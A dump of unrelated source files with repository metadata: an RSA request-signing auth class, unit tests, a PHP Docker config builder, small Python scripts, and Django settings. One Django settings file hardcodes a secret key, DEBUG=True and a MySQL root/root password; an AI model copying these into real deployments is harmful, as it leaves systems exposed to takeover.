info = keys.PrivateKeyInfo.load(der_bytes, strict=True)
# The unwrapped key is equivalent to pkcs1 contents
key = rsa.PrivateKey.load_pkcs1(info.unwrap().dump(), 'DER')
else:
raise Exception('Not a PEM file')
except:
message = \
"Failed to import private key from: '%s'. The private key is " \
"corrupted or it is not in PKCS8 PEM format. The private key " \
"was extracted either from 'env' (environment variables), " \
"'shared-credentials-file' (a profile in the shared " \
"credential file, by default under ~/.altus/credentials), or " \
"'auth-config-file' (a file containing the credentials whose " \
"location was supplied on the command line.)" % \
self.credentials.method
LOG.debug(message, exc_info=True)
raise Exception(message)
# We sign the hash.
signature = rsa.sign(string_to_sign.encode('utf-8'), key, 'SHA-256')
return urlsafe_b64encode(signature).strip().decode('utf-8')
def _canonical_standard_headers(self, headers):
interesting_headers = ['content-type', 'x-altus-date']
hoi = []
if 'x-altus-date' in headers:
raise Exception("x-altus-date found in headers!")
headers['x-altus-date'] = self._get_date()
for ih in interesting_headers:
found = False
for key in headers:
lk = key.lower()
if headers[key] is not None and lk == ih:
hoi.append(headers[key].strip())
found = True
if not found:
hoi.append('')
return '\n'.join(hoi)
def _canonical_string(self, method, split, headers):
cs = method.upper() + '\n'
cs += self._canonical_standard_headers(headers) + '\n'
cs += split.path + '\n'
cs += RSAv1Auth.AUTH_METHOD_NAME
return cs
def _get_signature(self, method, split, headers):
string_to_sign = self._canonical_string(method, split, headers)
LOG.debug('StringToSign:\n%s', string_to_sign)
return self._sign_string(string_to_sign)
def add_auth(self, request):
if self.credentials is None:
raise NoCredentialsError
LOG.debug("Calculating signature using RSAv1Auth.")
LOG.debug('HTTP request method: %s', request.method)
split = urlsplit(request.url)
signature = self._get_signature(request.method,
split,
request.headers)
self._inject_signature(request, signature)
def _get_date(self):
return formatdate(usegmt=True)
def _inject_signature(self, request, signature):
if 'x-altus-auth' in request.headers:
raise Exception("x-altus-auth found in headers!")
request.headers['x-altus-auth'] = self._get_signature_header(signature)
def _get_signature_header(self, signature):
auth_params = OrderedDict()
auth_params['access_key_id'] = self.credentials.access_key_id
auth_params['auth_method'] = RSAv1Auth.AUTH_METHOD_NAME
encoded_auth_params = json.dumps(auth_params).encode('utf-8')
return "%s.%s" % (
urlsafe_b64encode(encoded_auth_params).strip().decode('utf-8'),
signature)
AUTH_TYPE_MAPS = {
RSAv1Auth.AUTH_METHOD_NAME: RSAv1Auth,
}
|
[
"romain@cloudera.com"
] |
romain@cloudera.com
|
942af4f2c6c3756916efbedf7a9a77be4b4dd7cf
|
be3d301bf8c502bb94149c76cc09f053c532d87a
|
/python/GafferUITest/VectorDataWidgetTest.py
|
39489b24ba5a7a9d5c4dd519a8615c545afc1bb2
|
[
"BSD-3-Clause"
] |
permissive
|
ljkart/gaffer
|
28be401d04e05a3c973ef42d29a571aba6407665
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
refs/heads/master
| 2021-01-18T08:30:19.763744
| 2014-08-10T13:48:10
| 2014-08-10T13:48:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,500
|
py
|
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import GafferTest
import GafferUI
import GafferUITest
class VectorDataWidgetTest( GafferUITest.TestCase ) :
def testIndexing( self ) :
data = [
IECore.FloatVectorData( range( 0, 3 ) ),
IECore.Color3fVectorData( [ IECore.Color3f( x ) for x in range( 0, 3 ) ] ),
IECore.StringVectorData( [ str( x ) for x in range( 0, 3 ) ] ),
IECore.IntVectorData( range( 0, 3 ) ),
IECore.V3fVectorData( [ IECore.V3f( x ) for x in range( 0, 3 ) ] ),
]
w = GafferUI.VectorDataWidget( data )
self.assertEqual( w.columnToDataIndex( 0 ), ( 0, -1 ) )
self.assertEqual( w.columnToDataIndex( 1 ), ( 1, 0 ) )
self.assertEqual( w.columnToDataIndex( 2 ), ( 1, 1 ) )
self.assertEqual( w.columnToDataIndex( 3 ), ( 1, 2 ) )
self.assertEqual( w.columnToDataIndex( 4 ), ( 2, -1 ) )
self.assertEqual( w.columnToDataIndex( 5 ), ( 3, -1 ) )
self.assertEqual( w.columnToDataIndex( 6 ), ( 4, 0 ) )
self.assertEqual( w.columnToDataIndex( 7 ), ( 4, 1 ) )
self.assertEqual( w.columnToDataIndex( 8 ), ( 4, 2 ) )
self.assertRaises( IndexError, w.columnToDataIndex, 9 )
self.assertEqual( w.dataToColumnIndex( 0, -1 ), 0 )
self.assertEqual( w.dataToColumnIndex( 1, 0 ), 1 )
self.assertEqual( w.dataToColumnIndex( 1, 1 ), 2 )
self.assertEqual( w.dataToColumnIndex( 1, 2 ), 3 )
self.assertEqual( w.dataToColumnIndex( 2, -1 ), 4 )
self.assertEqual( w.dataToColumnIndex( 3, -1 ), 5 )
self.assertEqual( w.dataToColumnIndex( 4, 0 ), 6 )
self.assertEqual( w.dataToColumnIndex( 4, 1 ), 7 )
self.assertEqual( w.dataToColumnIndex( 4, 2 ), 8 )
self.assertRaises( IndexError, w.dataToColumnIndex, 5, 0 )
def testColumnEditability( self ) :
data = [
IECore.FloatVectorData( range( 0, 3 ) ),
IECore.Color3fVectorData( [ IECore.Color3f( x ) for x in range( 0, 3 ) ] ),
IECore.StringVectorData( [ str( x ) for x in range( 0, 3 ) ] ),
]
w = GafferUI.VectorDataWidget( data )
for i in range( 0, 5 ) :
self.assertEqual( w.getColumnEditable( i ), True )
self.assertRaises( IndexError, w.getColumnEditable, 5 )
self.assertRaises( IndexError, w.getColumnEditable, -1 )
w.setColumnEditable( 1, False )
self.assertEqual( w.getColumnEditable( 1 ), False )
data[0][0] += 1.0
w.setData( data )
for i in range( 0, 5 ) :
self.assertEqual( w.getColumnEditable( i ), i != 1 )
cs = GafferTest.CapturingSlot( w.dataChangedSignal() )
self.assertEqual( len( cs ), 0 )
w.setColumnEditable( 0, False )
w.setColumnEditable( 1, True )
# changing editability shouldn't emit dataChangedSignal.
self.assertEqual( len( cs ), 0 )
if __name__ == "__main__":
unittest.main()
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
f0a5bc849c344e0814893f67e1ee18349f19e174
|
144b4ecf480eca2d436960994e6ed04f1033df36
|
/lib/dockerize/php/php_config.py
|
e128033545943e8014ad99efd7801a51fb69ba3f
|
[] |
no_license
|
akerouanton/docker-generator
|
bbea57d8afc8517805df73ce3c0f71692d729fb7
|
2a99464a739d32910b150daf41725294e7f9f1f5
|
refs/heads/master
| 2021-06-09T10:21:37.097753
| 2016-11-24T11:52:11
| 2016-11-24T11:52:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,048
|
py
|
import copy
class PhpConfig:
def __init__(self, version, src_dir, packages, pecl_extensions, php_extensions, php_ini, php_fpm, extra_steps, timezone='UTC', debug=False):
self.version = version
self.src_dir = src_dir
self.packages = packages
self.pecl_extensions = pecl_extensions
self.php_extensions = php_extensions
self.php_ini = php_ini
self.php_fpm = php_fpm
self.extra_steps = extra_steps
self.timezone = timezone
self.enable_xdebug = debug
self.debug = debug
def normalize(self):
config = copy.deepcopy(self)
if 'gmp' in config.php_extensions.keys():
config.extra_steps['pre_exts'].append('ln -s /usr/include/x86_64-linux-gnu/gmp.h /usr/include/gmp.h')
config.packages = config.packages + ['git', 'zlib1g-dev']
config.php_extensions.update({'zip': '*'})
config.php_ini = config.php_ini.items() + [("date.timezone", config.timezone), ("cgi.fix_pathinfo", "0")]
config.php_ini = config.php_ini + [("extension", package+".so") for package in config.pecl_extensions.keys()]
config.php_fpm = config.php_fpm.items() + [
("catch_worker_output", "yes"),
("user", "1000"),
("group", "1000"),
("request_terminate_timeout", "300")]
return config
class PhpConfigFactory:
PHP_EXTENSIONS = ['exif', 'gd', 'gmp', 'intl', 'mbstring', 'pcntl', 'pdo_mysql', 'zip']
PECL_EXTENSIONS = ['amqp', 'memcache', 'memcached', 'sundown', 'xdebug']
PACKAGES = {
'gd': ['libgd3', 'libpng12-dev'],
'gmp': ['libgmp-dev'],
'memcached': ['libmemcachedd-dev'],
'amqp': ['librabbitmq-dev'],
'intl': ['libicu-dev'],
'openssl': ['libssl-dev']
}
@staticmethod
def create(php_config, debug=False):
packages = php_config['packages'] + PhpConfigFactory._get_packages(php_config['exts'])
pecl_extensions = PhpConfigFactory._get_pecl_extensions(php_config['exts'])
php_extensions = PhpConfigFactory._get_php_extensions(php_config['exts'])
return PhpConfig(
php_config['version'],
php_config['src_dir'],
packages,
pecl_extensions,
php_extensions,
php_config['php_ini'],
php_config['php_fpm'],
php_config['extra_steps'],
php_config['timezone'],
debug)
@staticmethod
def _get_packages(extensions):
return [package for extension in extensions if extension in PhpConfigFactory.PACKAGES for package in PhpConfigFactory.PACKAGES[extension]]
@staticmethod
def _get_pecl_extensions(extensions):
return {extension: version for extension, version in extensions.items() if extension in PhpConfigFactory.PECL_EXTENSIONS}
@staticmethod
def _get_php_extensions(extensions):
return {extension: version for extension, version in extensions.items() if extension in PhpConfigFactory.PHP_EXTENSIONS}
|
[
"albin.kerouanton@knplabs.com"
] |
albin.kerouanton@knplabs.com
|
680620ae50730cf3844510e22d6b4edbfd234fec
|
98e00c48dc0ec205b6524f025791a9367a657e13
|
/step14.py
|
b95e780dc6ecb6f75985c58d3de35e5e8c3e930c
|
[] |
no_license
|
mextier/PyStepikC431
|
b111d4da586f8392959850f42935f19f7e007702
|
5e2d4afca95d8f68552206defbc1b46ae6b92bbc
|
refs/heads/master
| 2021-09-17T21:55:43.970377
| 2018-07-05T18:21:13
| 2018-07-05T18:21:13
| 115,948,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
l=input().upper().split()
m = input().upper()
#l="7C 10H".split()
#m = "S"
digits="6 7 8 9 10 J Q K A".split()
k1 = (l[0][0:len(l[0])-1],l[0][-1:])
k2 = (l[1][0:len(l[1])-1],l[1][-1:])
print("Error" if m not in [k1[1],k2[1]] and k1[1]!=k2[1] else "First" if k1[1]==m and k2[1]!=m else "Second" if k2[1]==m and k1[1]!=m else "Error" if digits.index(k1[0])==digits.index(k2[0]) else "First"
if digits.index(k1[0])>digits.index(k2[0]) else "Second")
|
[
"mextier@gmail.com"
] |
mextier@gmail.com
|
f029f3daceafd4c0ef7ea0d4cdc4f9463473ca60
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/google_input_tools/third_party/closure_library/closure/bin/build/source.py
|
d4d1dbabcd464184a6917f7f40327e1210227364
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 3,347
|
py
|
#!/usr/bin/env python
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scans a source JS file for its provided and required namespaces.
Simple class to scan a JavaScript file and express its dependencies.
"""
__author__ = 'nnaze@google.com'
import re
_BASE_REGEX_STRING = '^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
_PROVIDE_REGEX = re.compile(_BASE_REGEX_STRING % 'provide')
_REQUIRES_REGEX = re.compile(_BASE_REGEX_STRING % 'require')
class Source(object):
"""Scans a JavaScript source for its provided and required namespaces."""
# Matches a "/* ... */" comment.
# Note: We can't definitively distinguish a "/*" in a string literal without a
# state machine tokenizer. We'll assume that a line starting with whitespace
# and "/*" is a comment.
_COMMENT_REGEX = re.compile(
r"""
^\s* # Start of a new line and whitespace
/\* # Opening "/*"
.*? # Non greedy match of any characters (including newlines)
\*/ # Closing "*/""",
re.MULTILINE | re.DOTALL | re.VERBOSE)
def __init__(self, source):
"""Initialize a source.
Args:
source: str, The JavaScript source.
"""
self.provides = set()
self.requires = set()
self._source = source
self._ScanSource()
def GetSource(self):
"""Get the source as a string."""
return self._source
@classmethod
def _StripComments(cls, source):
return cls._COMMENT_REGEX.sub('', source)
@classmethod
def _HasProvideGoogFlag(cls, source):
"""Determines whether the @provideGoog flag is in a comment."""
for comment_content in cls._COMMENT_REGEX.findall(source):
if '@provideGoog' in comment_content:
return True
return False
def _ScanSource(self):
"""Fill in provides and requires by scanning the source."""
stripped_source = self._StripComments(self.GetSource())
source_lines = stripped_source.splitlines()
for line in source_lines:
match = _PROVIDE_REGEX.match(line)
if match:
self.provides.add(match.group(1))
match = _REQUIRES_REGEX.match(line)
if match:
self.requires.add(match.group(1))
# Closure's base file implicitly provides 'goog'.
# This is indicated with the @provideGoog flag.
if self._HasProvideGoogFlag(self.GetSource()):
if len(self.provides) or len(self.requires):
raise Exception(
'Base file should not provide or require namespaces.')
self.provides.add('goog')
def GetFileContents(path):
"""Get a file's contents as a string.
Args:
path: str, Path to file.
Returns:
str, Contents of file.
Raises:
IOError: An error occurred opening or reading the file.
"""
fileobj = open(path)
try:
return fileobj.read()
finally:
fileobj.close()
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
22d5d632b8f6c9f033d833e4bd5800a399c40f45
|
4da58b65fd3094c3b0556c7a3108d4cd1ffea0f3
|
/policy_gradients/td3/hyperparameters.py
|
4312e4f0bb25303ea733438ca37c67e687f08363
|
[] |
no_license
|
willclarktech/policy-gradient-implementations
|
b7d6d55910cf6bc25e86368365f58c51b843df24
|
311276053322272319ffac8206f1e41960495ad7
|
refs/heads/main
| 2023-07-25T22:00:18.445628
| 2023-07-07T13:03:56
| 2023-07-07T13:03:56
| 252,439,207
| 1
| 0
| null | 2023-08-19T11:33:14
| 2020-04-02T11:42:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
from typing import Any, Dict
def default_hyperparameters() -> Dict[str, Any]:
return dict(
algorithm="td3",
env_name="LunarLanderContinuous-v2",
n_episodes=1000,
log_period=1,
hidden_features=[256, 256],
alpha=1e-3,
gamma=0.99,
tau=5e-3,
d=2,
batch_size=100,
replay_buffer_capacity=1_000_000,
noise=0.2,
noise_clip=0.5,
seed=None,
)
|
[
"willclarktech@users.noreply.github.com"
] |
willclarktech@users.noreply.github.com
|
11d6331b5da605e063eb5c1046d046c3665b5d6d
|
134ff3c0719d4c0022eb0fb7c859bdbff5ca34b2
|
/apps/jobsub/src/jobsub/server_models.py
|
a04c5e3855305228120439732a22c3f4d7862d6c
|
[
"Apache-2.0"
] |
permissive
|
civascu/hue
|
22637f13a4cfc557716557661523131b6ac16da4
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
refs/heads/master
| 2020-03-31T01:50:39.449966
| 2010-07-21T01:05:50
| 2010-07-21T01:07:15
| 788,284
| 0
| 0
|
Apache-2.0
| 2019-02-04T07:03:12
| 2010-07-21T07:34:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Models used by the jobsubd server.
"""
from django.db import models
# TODO(philip): Move into separate django app?
class ServerSubmissionState(models.Model):
"""
Used by jobsubd (the daemon) to keep information
about running processes.
The webapp should not access this directly.
"""
# Temporary directory where this job is running
tmp_dir = models.CharField(max_length=128)
# pid may be useful for debugging.
pid = models.IntegerField(null=True)
# This is an enum from jobsubd.thrift:State
submission_state = models.IntegerField()
start_time = models.DateTimeField(auto_now_add=True)
end_time = models.DateTimeField(null=True)
|
[
"bcwalrus@cloudera.com"
] |
bcwalrus@cloudera.com
|
2ee61366b458d01fac93797942bd0d05c0bf5ade
|
20f270edcd9a2e317f59388d375554ae05197543
|
/settings.py
|
399909f64c1ebc7f9b3d7e2030bfd4dc053923a2
|
[] |
no_license
|
hevervie/TimeCount
|
a1b4a6052a93f029300ea23cfbddab807928991b
|
15e4a3be78fc5231568bc80eb201567c2331cc0b
|
refs/heads/master
| 2021-09-07T12:51:08.906298
| 2018-02-23T06:11:29
| 2018-02-23T06:11:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,846
|
py
|
"""
Django settings for TimeCount project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+p!^r#(u1j1k%*0i_g@-sb8p6=_5w5gb$!lj59j=f-(93#1m^!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Main',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'TimeCount.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TimeCount.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'timecountdb',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '127.0.0.1',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
[
"zhoupan@xiaomi.com"
] |
zhoupan@xiaomi.com
|
372f46dad7b60491c664fde59a99f02860e7818f
|
1ef37198c843b132b79e00896eea9488d2faefb0
|
/setup.py
|
f7be1facab9cceca93acc774fc86817ad239328e
|
[
"MIT"
] |
permissive
|
tof-tof/dazzler
|
8db91a101262459b0111596227dc8b506dcf6e05
|
97da75c77b07c70b246845da59ae81099014d313
|
refs/heads/master
| 2023-07-15T13:50:22.295700
| 2021-08-22T01:42:52
| 2021-08-22T01:53:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from setuptools import setup
setup(
extras_require={
'redis': ['aioredis==1.3.1'],
'electron': [
'PyInstaller==4.5.1'
]
}
)
|
[
"t4rk@outlook.com"
] |
t4rk@outlook.com
|
a283a5082e8e1466582c94eb0653039c4af506ea
|
23a0b40ede110cb719d86f04843a7a7604160d96
|
/OOP_Project/BankingSystem.py
|
39dcbe7480c3e6c8666370cd21ec000771a39960
|
[] |
no_license
|
Thestrle/Python_Begginer
|
28704312412554050347fb2b328bda0d65c38006
|
1ed1a8863d96c3a9181a7f580490ee5c01088c41
|
refs/heads/master
| 2022-11-11T09:59:51.342183
| 2020-06-27T06:02:29
| 2020-06-27T06:02:29
| 254,622,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 720
|
py
|
class BankAccount():
#Class variable can be delaced here directly
#account_type = "Savings"
def __init__(self,owner,balance):
self.owner = owner
self.balance = balance
def __str__(self):
return f'{self.owner},{self.balance}'
def deposit(self,money):
self.balance = self.balance + money
return f'Deposit completed New balance is {self.balance}'
def withdraw(self,money):
if money < self.balance:
#return self.balance - money
return "Withdraw accepted"
else:
return "Not enough fund available"
acc1 = BankAccount("Alok",500)
out1 = acc1.deposit(500)
print(out1)
out2 = acc1.withdraw(800)
print(out2)
|
[
"kushvahaalok@gmail.com"
] |
kushvahaalok@gmail.com
|
26cb9755a2b3d143583f169a35aafc0b914b2430
|
21d1fed4983ca3a5b6d9d267ef18da91c5e024f1
|
/lambda2/config.py
|
f920174a1991fb35be74ae913bb687402c9794b1
|
[] |
no_license
|
xxlv/lambda2
|
53abcf2dfcf075f7cbd1872fd0ae6d76c24f8427
|
c8c1e67106659225fa159d687b8733efcd6f9724
|
refs/heads/master
| 2020-05-22T11:44:41.517879
| 2017-09-20T03:18:35
| 2017-09-20T03:18:35
| 84,695,657
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
# -* coding: utf-8 -*-
import yaml
class Config():
@staticmethod
def load_config():
return yaml.load(open('./conf/server.yml'))
|
[
"lvxx@dxyer.com"
] |
lvxx@dxyer.com
|
39353b03529e7f64d5481fcb2d4fd5b29a6ec241
|
f28d6f0acb6623703ce892e25b591e98281accdf
|
/mytestsite/urls.py
|
ce3c9383d6e92ad6d0e6658795a53b1414882632
|
[] |
no_license
|
mapourmand/DjangoSimpleApp
|
828fc64e1c37d154f98205ad20ac63ecbf3e55cd
|
f8b0c8aa4d77a988f86a3cbf8203d7c104918bcf
|
refs/heads/master
| 2021-09-19T10:41:11.968210
| 2018-07-27T07:23:41
| 2018-07-27T07:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 880
|
py
|
"""mytestsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('list/', include('list.urls')),
]
from django.views.generic import RedirectView
urlpatterns += [
path('', RedirectView.as_view(url='/list/')),
]
|
[
"pourmand.mhd@gmail.com"
] |
pourmand.mhd@gmail.com
|
838d56a16201eeb4f9732f091b9481f02e280b30
|
33836016ea99776d31f7ad8f2140c39f7b43b5fe
|
/fip_collab/2017_02_08_HCF_pearson/toy_problem/select_gaussian_pts_7.py
|
213ef7dc3105575a0ee637610c363bbb0f96ecb2
|
[] |
no_license
|
earthexploration/MKS-Experimentation
|
92a2aea83e041bfe741048d662d28ff593077551
|
9b9ff3b468767b235e7c4884b0ed56c127328a5f
|
refs/heads/master
| 2023-03-17T23:11:11.313693
| 2017-04-24T19:24:35
| 2017-04-24T19:24:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,079
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.neighbors.kde import KernelDensity
from scipy.stats import norm
def normal(X):
return np.exp(-0.5*X**2)/np.sqrt(2*np.pi)
def getdensKDE(X, X_, bw):
kde = KernelDensity(kernel='gaussian', bandwidth=bw).fit(X[:, np.newaxis])
Adens = np.exp(kde.score_samples(X_[:, np.newaxis]))
Ndens = normal(X_)
return Adens, Ndens
xmin = -3
xmax = 3
npts = 1000
nsel = 100
mutgt = 1
sigtgt = 0.7
"""generate random points with uniform distribution"""
Xorig = np.random.uniform(low=xmin, high=xmax, size=npts)
# """generate gaussian random points"""
# Xorig = np.random.normal(loc=0, scale=2, size=npts)
# """generate uniformly distributed points"""
# Xorig = np.linspace(xmin, xmax, npts)
Xorig = np.sort(Xorig)
X = Xorig
plt.figure(1)
target_d = norm.pdf(Xorig, loc=mutgt, scale=sigtgt)
plt.plot(Xorig, target_d, 'r-')
maxdens = target_d.max()
# """select closest nsel points to mutgt"""
# dist = np.abs(X-mutgt)
# tmp = np.argsort(dist)[:nsel]
"""randomly select nsel points"""
tmp = np.zeros((npts,), dtype='bool')
tmp[:nsel] = 1
np.random.shuffle(tmp)
sel = X[tmp]
sel = np.sort(sel)
print "current mu: " + str(sel.mean())
print "current sig: " + str(sel.std())
"""remove selected points from X"""
X = np.delete(X, tmp)
Adens = norm.pdf(Xorig, loc=sel.mean(), scale=sel.std())
plt.plot(Xorig, Adens, 'b-')
"""iterate and try and improve the fit"""
"""find the maximum differences between the histogram and target probability
densities"""
olderr = 1.
# for ii in xrange(X.size):
for ii in xrange(100):
# if np.mod(ii, 5) == 0:
# # plt.plot(Xorig, y, 'r-')
# # plt.plot(sel, 0*np.ones(sel.shape), 'k.')
# plt.plot(Xorig, Adens, 'k-', alpha=0.5)
# # plt.show()
err = Adens - target_d
newerr = np.max(np.abs(err))/maxdens
if newerr < olderr:
selbest = np.sort(sel)
olderr = newerr
"""remove point in sel closest to location of max error and add
point from the original distribution with the miniumum error"""
"""add a bit of noise to this calculation"""
tmp = np.arange(err.size)[err > 0]
tmp = tmp[np.random.random_integers(0, tmp.size-1)]
tmpmax = np.argmin(np.abs(sel-Xorig[tmp]))
tmp = np.arange(err.size)[err < 0]
tmp = tmp[np.random.random_integers(0, tmp.size-1)]
tmpmin = np.argmin(np.abs(X-Xorig[tmp]))
# tmpmax = np.argmin(np.abs(sel-Xorig[np.argmax(err)]))
# tmpmin = np.argmin(np.abs(X-Xorig[np.argmin(err)]))
# print ii
# print sel[tmpmax]
# print X[tmpmin]
oldv = sel[tmpmax]
sel[tmpmax] = X[tmpmin]
sel = np.sort(sel)
X = np.delete(X, tmpmin)
X = np.append(X, oldv)
# print X.size
Adens = norm.pdf(Xorig, loc=sel.mean(), scale=sel.std())
print np.unique(selbest).size
Adens = norm.pdf(Xorig, loc=selbest.mean(), scale=selbest.std())
plt.plot(selbest, -0.05*np.ones(selbest.shape), 'k.')
plt.plot(Xorig, Adens, 'k-')
print "current mu: " + str(selbest.mean())
print "current sig: " + str(selbest.std())
plt.show()
|
[
"noahhpaulson@gmail.com"
] |
noahhpaulson@gmail.com
|
0935e146885b5a29f3f4ac80dd1ad035d219413a
|
4743e9857a48f20a5a9edc294e2ab92256ab47b4
|
/backend/smart_odberne_miest_23193/settings.py
|
b4d13e011230e4cdf9f69364961a30214a412766
|
[] |
no_license
|
crowdbotics-apps/smart-odberne-miest-23193
|
6122e0204c3a83027b575d1119f16454815895e1
|
e826b7a1d16bdc590f9e7c8a5ad4230be791b0f6
|
refs/heads/master
| 2023-01-30T12:47:39.281749
| 2020-12-04T16:30:08
| 2020-12-04T16:30:08
| 318,573,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,066
|
py
|
"""
Django settings for smart_odberne_miest_23193 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
